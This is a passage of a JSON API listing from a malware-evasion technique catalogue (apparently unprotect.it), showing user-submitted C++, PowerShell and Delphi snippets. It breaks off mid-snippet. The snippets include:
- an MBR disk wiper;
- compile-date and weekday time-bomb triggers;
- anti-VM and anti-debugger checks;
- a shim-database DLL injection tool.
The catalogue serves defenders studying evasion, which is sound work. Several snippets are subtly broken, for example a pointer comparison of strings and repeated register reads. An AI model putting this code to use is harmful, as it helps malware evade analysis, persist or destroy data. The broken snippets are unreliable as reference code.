HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 237,
"next": null,
"previous": "https://unprotect.it/api/snippets/?format=api&page=4",
"results": [
{
"id": 38,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/134/?format=api",
"description": "Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.",
"plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\n#define MBR_SIZE 512\r\n\r\nusing namespace std;\r\n\r\nint WipeMBR(void) {\r\n char dmbr[MBR_SIZE];\r\n\r\n ZeroMemory(&dmbr, sizeof(dmbr));\r\n HANDLE disk = CreateFile((LPCSTR)\"\\\\\\\\.\\\\PhysicalDrive0\", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);\r\n CloseHandle(disk);\r\n return 0;\r\n}\r\n\r\nint main() {\r\n cout << \"Start Wiping\" << endl;\r\n WipeMBR();\r\n return 0;\r\n}"
},
{
"id": 35,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/21/?format=api",
"description": "Original code available here: https://github.com/a0rtega/pafish/blob/master/pafish/cpu.c",
"plain_code": "/* Check hypervisor presence bit */\r\nstatic inline int cpuid_hv_bit(){\r\n int ecx;\r\n __asm__ volatile(\"cpuid\" \\\r\n : \"=c\"(ecx) \\\r\n : \"a\"(0x01));\r\n return (ecx>>31) & 0x1;\r\n}\r\n/* Get hypervisor name */\r\nstatic inline void cpuid_hv_vendor_00(char * vendor){\r\n int ebx = 0, ecx = 0, edx = 0;\r\n __asm__ volatile(\"cpuid\" \\\r\n : \"=b\"(ebx), \\\r\n : \"=c\"(ecx), \\\r\n : \"=d\"(edx) \\\r\n : \"a\"(0x40000000));\r\n sprintf(vendor, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n sprintf(vendor+4, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n sprintf(vendor+8, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n vendor[12] = 0x00;\r\n}\r\nvoid cpu_write_hv_vendor(char * vendor){\r\n cpuid_hv_vendor_00(vendor);\r\n}\r\nint cpu_known_vm_vendors(){\r\n const int count = 6;\r\n int i;\r\n char cpu_hv_vendor[13];\r\n strings strs[count];\r\n strs[0] = \"KVMKVMKVM\\0\\0\\0\"; /* KVM */\r\n strs[1] = \"Microsoft Hv\"; /* Microsoft Hyper-V or Windows Virtual PC */\r\n strs[2] = \"VMwareVMware\"; /* VMware */\r\n strs[3] = \"XenVMMXenVMM\"; /* Xen */\r\n strs[4] = \"prl hyperv\"; */ Parallels */\r\n strs[5] = \"VBoxVBoxVBox\"; /* VirtualBox */\r\n cpu_write_hv_vendor(cpu_hv_vendor);\r\n for (i=0; i < count; i++){\r\n if (!memcmp(cpu_hv_vendor,strs[i], 12)) return TRUE;\r\n }\r\n return FALSE;\r\n}"
},
{
"id": 36,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/103/?format=api",
"description": "This code snippet triggers actions after one day since the compile time.",
"plain_code": "#include <ctime>\r\n#include <iostream>\r\n#include <string>\r\n#include <sstream>\r\n\r\nconst double time_attack_in_days = 1.0;\r\n\r\nusing namespace std;\r\n\r\ntime_t time_when_compiled()\r\n{\r\n string datestr = __DATE__;\r\n string timestr = __TIME__;\r\n istringstream iss_date(datestr);\r\n string str_month;\r\n int day;\r\n int year;\r\n iss_date >> str_month >> day >> year;\r\n\r\n int month;\r\n if (str_month == \"Jan\") month = 1;\r\n else if (str_month == \"Feb\") month = 2;\r\n else if (str_month == \"Mar\") month = 3;\r\n else if (str_month == \"Apr\") month = 4;\r\n else if (str_month == \"May\") month = 5;\r\n else if (str_month == \"Jun\") month = 6;\r\n else if (str_month == \"Jul\") month = 7;\r\n else if (str_month == \"Aug\") month = 8;\r\n else if (str_month == \"Sep\") month = 9;\r\n else if (str_month == \"Oct\") month = 10;\r\n else if (str_month == \"Nov\") month = 11;\r\n else if (str_month == \"Dec\") month = 12;\r\n else exit(-1);\r\n\r\n for(string::size_type pos = timestr.find(':'); pos != string::npos; pos = timestr.find(':', pos))\r\n {\r\n \ttimestr[pos] = ' ';\r\n }\r\n\r\n istringstream iss_time(timestr);\r\n int hour, min, sec;\r\n iss_time >> hour >> min >> sec;\r\n tm t = {0};\r\n t.tm_mon = month - 1;\r\n t.tm_mday = day;\r\n t.tm_year = year - 1900;\r\n t.tm_hour = hour;\r\n t.tm_min = min;\r\n t.tm_sec = sec;\r\n\r\n return mktime(&t);\r\n}\r\n\r\nint main()\r\n{\r\n time_t current_time = time(NULL);\r\n time_t build_time = time_when_compiled();\r\n\r\n double diff_time = difftime(current_time, build_time);\r\n const double time_to_wait = time_attack_in_days * 24.0 * 60.0 * 60.0;\r\n\r\n // trigger the time of execution\r\n if(diff_time > time_to_wait)\r\n {\r\n cout << \"Time of attack!\" << endl;\r\n exit(-1);\r\n }\r\n else\r\n {\r\n cout << \"Time in second before running the attack: \" << time_to_wait << endl;\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 37,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/103/?format=api",
"description": "Trigger the action on Monday.",
"plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\nusing namespace std;\r\n\r\n// Trigger the action only on Monday\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n time_t rawtime;\r\n struct tm * timeinfo;\r\n char buffer[100];\r\n\r\n time(&rawtime);\r\n timeinfo = localtime(&rawtime);\r\n\r\n strftime(buffer, sizeof(buffer), \"%A\", timeinfo);\r\n\r\n const char * str(buffer);\r\n\r\n if (str == \"Monday\")\r\n {\r\n cout << \"Wait!\" << endl;\r\n MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n }\r\n else\r\n {\r\n cout << \"Time of attack!\" << endl;\r\n MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n }\r\n return 0;\r\n}"
},
{
"id": 33,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 9,
"username": "Glacius",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Glacius___",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/63/?format=api",
"description": "",
"plain_code": "#include <Winternl.h>\r\n#include <Windows.h>\r\n#include <tchar.h>\r\n#include <stdio.h>\r\n\r\n/*\r\n*Using ZwQueryInformationProcess we get the PEB Address and \r\n*then we check the NtGlobalFlag to determine the process is being debugged or not.\r\n*/\r\n\r\nint main() {\r\n \r\n typedef unsigned long(__stdcall *pfnZwQueryInformationProcess)\r\n (\r\n IN HANDLE,\r\n IN unsigned int, \r\n OUT PVOID, \r\n IN ULONG, \r\n OUT PULONG\r\n );\r\n pfnZwQueryInformationProcess ZwQueryInfoProcess = NULL;\r\n \r\n HMODULE hNtDll = LoadLibrary(_T("ntdll.dll"));\r\n if (hNtDll == NULL) { }\r\n \r\n ZwQueryInfoProcess = (pfnZwQueryInformationProcess) GetProcAddress(hNtDll,\r\n "ZwQueryInformationProcess");\r\n if (ZwQueryInfoProcess == NULL) { }\r\n unsigned long status;\r\n \r\n DWORD pid = GetCurrentProcessId();\r\n HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);\r\n PROCESS_BASIC_INFORMATION pbi;\r\n status = ZwQueryInfoProcess(hProcess,\r\n ProcessBasicInformation,\r\n &pbi,\r\n sizeof(pbi),\r\n NULL);\r\n \r\n PPEB peb_addr = pbi.PebBaseAddress;\r\n DWORD ptr = pbi.PebBaseAddress;\r\n ptr|=104;\r\n DWORD *temp = ptr;\r\n MessageBox(0, *temp ? "Debugger found" : "Debugger not found","Status",0x30);\r\n \r\n return 0;\r\n}"
},
{
"id": 34,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/69/?format=api",
"description": "",
"plain_code": "#include \"windows.h\"\r\n#include <stdio.h>\r\n\r\nvoid NTAPI __stdcall TLSCallbacks(PVOID DllHandle, DWORD dwReason, PVOID Reserved);\r\n\r\n#ifdef _M_IX86\r\n#pragma comment (linker, \"/INCLUDE:__tls_used\")\r\n#pragma comment (linker, \"/INCLUDE:__tls_callback\")\r\n#else\r\n#pragma comment (linker, \"/INCLUDE:_tls_used\")\r\n#pragma comment (linker, \"/INCLUDE:_tls_callback\")\r\n#endif\r\nEXTERN_C\r\n#ifdef _M_X64\r\n#pragma const_seg (\".CRT$XLB\")\r\nconst\r\n#else\r\n#pragma data_seg (\".CRT$XLB\")\r\n#endif\r\n\r\nPIMAGE_TLS_CALLBACK _tls_callback = TLSCallbacks;\r\n#pragma data_seg ()\r\n#pragma const_seg ()\r\n\r\nvoid NTAPI __stdcall TLSCallbacks(PVOID DllHandle, DWORD dwReason, PVOID Reserved)\r\n{\r\n\tMessageBox(nullptr, \"TLS Callback\", \"\", 0);\r\n\tExitProcess(0);\r\n}\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tprintf(\"Main function!\");\r\n}"
},
{
"id": 31,
"language": {
"id": 8,
"label": "PowerShell",
"code_class": "powershell"
},
"user": {
"id": 9,
"username": "Glacius",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Glacius___",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/150/?format=api",
"description": "If the return is \"MSAcpi_ThermalZoneTemperature not supported, it means you are in a virtualized environment.\r\nReference : https://gist.github.com/teixeira0xfffff/36293713c254c69a7ba2353e8d64afce#file-msacpi_thermalzonetemperature-ps1",
"plain_code": "function Get-AntiVMwithTemperature {\r\n $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace \"root/wmi\"\r\n $valorTempKelvin = $t.CurrentTemperature / 10\r\n $valorTempCelsius = $valorTempKelvin - 273.15\r\n $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32\r\n return $valorTempCelsius.ToString() + \" C : \" + $valorTempFahrenheit.ToString() + \" F : \" + $valorTempKelvin + \"K\" \r\n}"
},
{
"id": 32,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 9,
"username": "Glacius",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Glacius___",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/53/?format=api",
"description": "",
"plain_code": "#include \"windows.h\"\r\n \r\nint main(void)\r\n{\r\n BOOL HasDebugPort = FALSE;\r\n \r\n if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &HasDebugPort))\r\n {\r\n ExitProcess(0); // Running in ring-3 debugger\r\n }\r\n // Running outside ring-3 debugger\r\n return 0;"
},
{
"id": 30,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/116/?format=api",
"description": "",
"plain_code": "/*\r\nSource: https://gist.github.com/w4kfu/95a87764db7029e03f09d78f7273c4f4\r\n-------- dllinjshim.cpp --------\r\n> cl /Fe:dllinjshim.exe dllinjshim.cpp\r\n> dllinjshim.exe\r\n> sdbinst moo.sdb\r\n/!\\ On Windows 10 there is a new function `SdbIsKnownShimDll` called \r\nin `SdbGetDllPath` which will check the DLL name against the following list:\r\n- \"AcGenral.dll\"\r\n- \"AcLayers.dll\"\r\n- \"AcRes.dll\"\r\n- \"AcSpecfc.dll\"\r\n- \"AcWinRT.dll\"\r\n- \"acwow64.dll\"\r\n- \"AcXtrnal.dll\"\r\n- \"KeyboardFilterShim.dll\"\r\n- \"MasterShim.dll\"\r\n- \"depdetct\"\r\n- \"uacdetct\"\r\n- \"luadgmgt.dll\"\r\n- \"luapriv.dll\"\r\n- \"EMET.dll\"\r\n- \"EMET64.dll\"\r\n- \"LogExts.dll\"\r\n- \"LogShim.dll\"\r\n------------------------------------\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#define INJECTED_DLL_NAME L\"moo.dll\"\r\n\r\n#define EXECUTABLE_NAME L\"calc.exe\"\r\n#define OS_PLATFORM 4 /* 0x1 : 32-bit ; 0x04 : 64-bit */\r\n\r\n\r\n#define TAGID_NULL 0\r\n\r\n#define TAG_TYPE_LIST 0x7000\r\n#define TAG_DATABASE (0x1 | TAG_TYPE_LIST)\r\n#define TAG_LIBRARY (0x2 | TAG_TYPE_LIST)\r\n#define TAG_INEXCLUDE (0x3 | TAG_TYPE_LIST)\r\n#define TAG_SHIM (0x4 | TAG_TYPE_LIST)\r\n#define TAG_EXE (0x7 | TAG_TYPE_LIST)\r\n#define TAG_MATCHING_FILE (0x8 | TAG_TYPE_LIST)\r\n#define TAG_SHIM_REF (0x9 | TAG_TYPE_LIST)\r\n\r\n#define TAG_TYPE_DWORD 0x4000\r\n#define TAG_OS_PLATFORM (0x23| TAG_TYPE_DWORD)\r\n\r\n#define TAG_TYPE_STRINGREF 0x6000\r\n#define TAG_NAME (0x1 | TAG_TYPE_STRINGREF)\r\n#define TAG_MODULE (0x3 | TAG_TYPE_STRINGREF)\r\n#define TAG_APP_NAME (0x6 | TAG_TYPE_STRINGREF)\r\n#define TAG_DLLFILE (0xA | TAG_TYPE_STRINGREF)\r\n\r\n#define TAG_TYPE_BINARY 0x9000\r\n#define TAG_EXE_ID (0x4 | TAG_TYPE_BINARY)\r\n#define TAG_DATABASE_ID (0x7 | TAG_TYPE_BINARY)\r\n\r\n#define TAG_TYPE_NULL 0x1000\r\n#define TAG_INCLUDE (0x1 | TAG_TYPE_NULL)\r\n\r\ntypedef enum _PATH_TYPE {\r\n DOS_PATH,\r\n NT_PATH\r\n} PATH_TYPE;\r\n\r\ntypedef HANDLE PDB;\r\ntypedef DWORD TAG;\r\ntypedef DWORD INDEXID;\r\ntypedef DWORD TAGID;\r\n\r\ntypedef struct tagATTRINFO {\r\n TAG tAttrID;\r\n DWORD dwFlags;\r\n union {\r\n ULONGLONG ullAttr;\r\n DWORD dwAttr;\r\n TCHAR *lpAttr;\r\n };\r\n} ATTRINFO, *PATTRINFO;\r\n\r\ntypedef PDB (WINAPI *SdbCreateDatabasePtr)(LPCWSTR, PATH_TYPE);\r\ntypedef VOID (WINAPI *SdbCloseDatabaseWritePtr)(PDB);\r\ntypedef TAGID (WINAPI *SdbBeginWriteListTagPtr)(PDB, TAG);\r\ntypedef BOOL (WINAPI *SdbEndWriteListTagPtr)(PDB, TAGID);\r\ntypedef BOOL (WINAPI *SdbWriteStringTagPtr)(PDB, TAG, LPCWSTR);\r\ntypedef BOOL (WINAPI *SdbWriteDWORDTagPtr)(PDB, TAG, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteBinaryTagPtr)(PDB, TAG, PBYTE, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteNULLTagPtr)(PDB, TAG);\r\n\r\ntypedef struct _APPHELP_API {\r\n SdbCreateDatabasePtr SdbCreateDatabase;\r\n SdbCloseDatabaseWritePtr SdbCloseDatabaseWrite;\r\n SdbBeginWriteListTagPtr SdbBeginWriteListTag;\r\n SdbEndWriteListTagPtr SdbEndWriteListTag;\r\n SdbWriteStringTagPtr SdbWriteStringTag;\r\n SdbWriteDWORDTagPtr SdbWriteDWORDTag;\r\n SdbWriteBinaryTagPtr SdbWriteBinaryTag;\r\n SdbWriteNULLTagPtr SdbWriteNULLTag;\r\n} APPHELP_API, *PAPPHELP_API;\r\n\r\nBOOL static LoadAppHelpFunctions(HMODULE hAppHelp, PAPPHELP_API pAppHelp) {\r\n if (!(pAppHelp->SdbBeginWriteListTag = (SdbBeginWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbBeginWriteListTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbBeginWriteListTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbCloseDatabaseWrite = (SdbCloseDatabaseWritePtr)GetProcAddress(hAppHelp, \"SdbCloseDatabaseWrite\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCloseDatabaseWrite\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbCreateDatabase = (SdbCreateDatabasePtr)GetProcAddress(hAppHelp, \"SdbCreateDatabase\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCreateDatabase\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbEndWriteListTag = (SdbEndWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbEndWriteListTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbEndWriteListTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbWriteBinaryTag = (SdbWriteBinaryTagPtr)GetProcAddress(hAppHelp, \"SdbWriteBinaryTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteBinaryTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbWriteDWORDTag = (SdbWriteDWORDTagPtr)GetProcAddress(hAppHelp, \"SdbWriteDWORDTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteDWORDTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbWriteStringTag = (SdbWriteStringTagPtr)GetProcAddress(hAppHelp, \"SdbWriteStringTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteStringTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n if (!(pAppHelp->SdbWriteNULLTag = (SdbWriteNULLTagPtr)GetProcAddress(hAppHelp, \"SdbWriteNULLTag\"))) {\r\n fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteNULLTag\\\")\\n\");\r\n return FALSE;\r\n }\r\n return TRUE;\r\n}\r\n\r\nBOOL static DoStuff(PAPPHELP_API pAppHelp)\r\n{\r\n PDB db = NULL;\r\n TAGID tIdDatabase;\r\n TAGID tIdLibrary;\r\n TAGID tIdShim;\r\n TAGID tIdInexclude;\r\n TAGID tIdExe;\r\n TAGID tIdMatchingFile;\r\n TAGID tIdShimRef;\r\n \r\n db = pAppHelp->SdbCreateDatabase(L\"moo.sdb\", DOS_PATH);\r\n if (db == NULL) {\r\n fprintf(stderr, \"[-] SdbCreateDatabase failed : %lu\\n\", GetLastError());\r\n return FALSE;\r\n }\r\n tIdDatabase = pAppHelp->SdbBeginWriteListTag(db, TAG_DATABASE);\r\n pAppHelp->SdbWriteDWORDTag(db, TAG_OS_PLATFORM, OS_PLATFORM);\r\n pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Database\");\r\n pAppHelp->SdbWriteBinaryTag(db, TAG_DATABASE_ID, \"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\", 0x10);\r\n tIdLibrary = pAppHelp->SdbBeginWriteListTag(db, TAG_LIBRARY);\r\n tIdShim = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM);\r\n pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n pAppHelp->SdbWriteStringTag(db, TAG_DLLFILE, INJECTED_DLL_NAME);\r\n tIdInexclude = pAppHelp->SdbBeginWriteListTag(db, TAG_INEXCLUDE);\r\n pAppHelp->SdbWriteNULLTag(db, TAG_INCLUDE);\r\n pAppHelp->SdbWriteStringTag(db, TAG_MODULE, L\"*\");\r\n pAppHelp->SdbEndWriteListTag(db, tIdInexclude);\r\n pAppHelp->SdbEndWriteListTag(db, tIdShim);\r\n pAppHelp->SdbEndWriteListTag(db, tIdLibrary);\r\n tIdExe = pAppHelp->SdbBeginWriteListTag(db, TAG_EXE);\r\n pAppHelp->SdbWriteStringTag(db, TAG_NAME, EXECUTABLE_NAME);\r\n pAppHelp->SdbWriteStringTag(db, TAG_APP_NAME, L\"moo_Apps\");\r\n pAppHelp->SdbWriteBinaryTag(db, TAG_EXE_ID, \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\", 0x10);\r\n tIdMatchingFile = pAppHelp->SdbBeginWriteListTag(db, TAG_MATCHING_FILE);\r\n pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"*\");\r\n pAppHelp->SdbEndWriteListTag(db, tIdMatchingFile);\r\n tIdShimRef = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM_REF);\r\n pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n pAppHelp->SdbEndWriteListTag(db, tIdShimRef);\r\n pAppHelp->SdbEndWriteListTag(db, tIdExe);\r\n pAppHelp->SdbEndWriteListTag(db, tIdDatabase);\r\n pAppHelp->SdbCloseDatabaseWrite(db);\r\n return TRUE;\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n APPHELP_API api = {0};\r\n HMODULE hAppHelp = NULL;\r\n \r\n hAppHelp = LoadLibraryA(\"apphelp.dll\");\r\n if (hAppHelp == NULL) {\r\n fprintf(stderr, \"[-] LoadLibrary failed %lu\\n\", GetLastError());\r\n return 1;\r\n }\r\n if (LoadAppHelpFunctions(hAppHelp, &api) == FALSE) {\r\n printf(\"[-] Failed to load apphelp api %lu!\\n\", GetLastError());\r\n return 1;\r\n }\r\n DoStuff(&api);\r\n return 0;\r\n}\r\nmoo.cpp\r\n/*\r\n-------- moo.cpp --------\r\n> cl /LD /Fe:moo.dll moo.cpp\r\n> copy moo.dll \"C:\\Windows\\AppPatch\\AppPatch64\\moo.dll\"\r\n-------------------------\r\n*/\r\n\r\n#define EXPORT_FUNC extern \"C\" __declspec(dllexport)\r\n\r\nEXPORT_FUNC int GetHookAPIs(PVOID a, PVOID b, PVOID c)\r\n{\r\n return 0x01; \r\n}\r\n\r\nEXPORT_FUNC int NotifyShims(PVOID a, PVOID b)\r\n{\r\n return 0x01; \r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n UNREFERENCED_PARAMETER(hinstDLL);\r\n UNREFERENCED_PARAMETER(lpReserved);\r\n\r\n if (fdwReason == DLL_PROCESS_ATTACH) {\r\n return TRUE;\r\n }\r\n return TRUE;\r\n}"
},
{
"id": 27,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/149/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n#include <cstring>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\nint main(int argc, char** argv)\r\n{\r\n TCHAR szExeFileName[MAX_PATH];\r\n GetModuleFileName(NULL, szExeFileName, MAX_PATH);\r\n\r\n // full path\r\n cout << \"[+] Full Path: \" << szExeFileName << endl;\r\n\r\n //convert tchar to string\r\n std:string filename (szExeFileName);\r\n\r\n // Remove directory if present.\r\n const size_t last_slash_idx = filename.find_last_of(\"\\\\/\");\r\n if (std::string::npos != last_slash_idx)\r\n {\r\n filename.erase(0, last_slash_idx + 1);\r\n }\r\n\r\n // Blacklist\r\n LPSTR fname[] = {\"sample.exe\",\r\n \"malware.exe\",\r\n // ADD YOUR PROCESS NAME HERE!\r\n };\r\n for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n {\r\n if ((fname[i] == filename ))\r\n {\r\n cout << \" [!] Filename is blacklisted: \" << (fname[i]) << endl;\r\n exit(0);\r\n }\r\n }\r\n return 0;\r\n}"
},
{
"id": 28,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/55/?format=api",
"description": "You can compile this code snippet as a classical Delphi Console Application.",
"plain_code": "program ADB_NtSetInformationThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n WinAPI.Windows, System.SysUtils;\r\n\r\ntype\r\n // ntddk.h\r\n TThreadInfoClass = (\r\n ThreadBasicInformation,\r\n ThreadTimes,\r\n ThreadPriority,\r\n ThreadBasePriority,\r\n ThreadAffinityMask,\r\n ThreadImpersonationToken,\r\n ThreadDescriptorTableEntry,\r\n ThreadEnableAlignmentFaultFixup,\r\n ThreadEventPair_Reusable,\r\n ThreadQuerySetWin32StartAddress,\r\n ThreadZeroTlsCell,\r\n ThreadPerformanceCount,\r\n ThreadAmILastThread,\r\n ThreadIdealProcessor,\r\n ThreadPriorityBoost,\r\n ThreadSetTlsArrayAddress,\r\n ThreadIsIoPending,\r\n ThreadHideFromDebugger, {<--}\r\n ThreadBreakOnTermination,\r\n ThreadSwitchLegacyState,\r\n ThreadIsTerminated,\r\n ThreadLastSystemCall,\r\n ThreadIoPriority,\r\n ThreadCycleTime,\r\n ThreadPagePriority,\r\n ThreadActualBasePriority,\r\n ThreadTebInformation,\r\n ThreadCSwitchMon,\r\n ThreadCSwitchPmu,\r\n ThreadWow64Context,\r\n ThreadGroupInformation,\r\n ThreadUmsInformation,\r\n ThreadCounterProfiling,\r\n ThreadIdealProcessorEx,\r\n ThreadCpuAccountingInformation,\r\n ThreadSuspendCount,\r\n ThreadActualGroupAffinity,\r\n ThreadDynamicCodePolicyInfo,\r\n MaxThreadInfoClass\r\n );\r\n\r\n var hNtDll : THandle;\r\n AThread : THandle;\r\n AThreadId : Cardinal;\r\n\r\n NtSetInformationThread : function(\r\n ThreadHandle : THandle;\r\n ThreadInformationClass : TThreadInfoClass;\r\n ThreadInformation : PVOID;\r\n ThreadInformationLength : ULONG\r\n ) : NTSTATUS; stdcall;\r\n\r\n const\r\n STATUS_SUCCESS = $00000000;\r\n\r\n{-------------------------------------------------------------------------------\r\n Hide Thread From Debugger\r\n-------------------------------------------------------------------------------}\r\nfunction HideThread(AThreadHandle : THandle) : Boolean;\r\nvar AThreadInformation : ULONG;\r\n AStatus : NTSTATUS;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n if not assigned(NtSetInformationThread) then\r\n Exit();\r\n\r\n\r\n\r\n // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntsetinformationthread\r\n AStatus := NtSetInformationThread(AThreadHandle, ThreadHideFromDebugger, nil, 0);\r\n\r\n case AStatus of\r\n {\r\n STATUS_INFO_LENGTH_MISMATCH\r\n }\r\n NTSTATUS($C0000004) : begin\r\n WriteLn('Error: Status Info Length Mismatch.');\r\n end;\r\n\r\n {\r\n STATUS_INVALID_PARAMETER\r\n }\r\n NTSTATUS($C000000D) : begin\r\n WriteLn('Error: Invalid Parameter.');\r\n end;\r\n\r\n {\r\n STATUS_SUCCESS\r\n }\r\n NTSTATUS($00000000) : begin\r\n WriteLn(Format('Thread: %d is now successfully hidden from debuggers.', [AThreadHandle]));\r\n\r\n result := True;\r\n end;\r\n\r\n {\r\n Other Errors\r\n }\r\n else begin\r\n WriteLn('Error: Unknown.');\r\n end;\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___thread:example\r\n-------------------------------------------------------------------------------}\r\nprocedure ThreadExample(pParam : PVOID); stdcall;\r\nbegin\r\n WriteLn('Example Thread Begin.');\r\n\r\n\r\n {\r\n If we are attached to a debugger, we trigger a new breakpoint.\r\n\r\n If thread is set with hidden from debugger, process should crash.\r\n }\r\n if IsDebuggerPresent() then begin\r\n asm\r\n int 3\r\n end;\r\n end;\r\n\r\n WriteLn('Example Thread Ends.');\r\n\r\n ///\r\n ExitThread(0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n try\r\n hNtDll := LoadLibrary('NTDLL.DLL');\r\n if (hNtDll = 0) then\r\n Exit();\r\n try\r\n 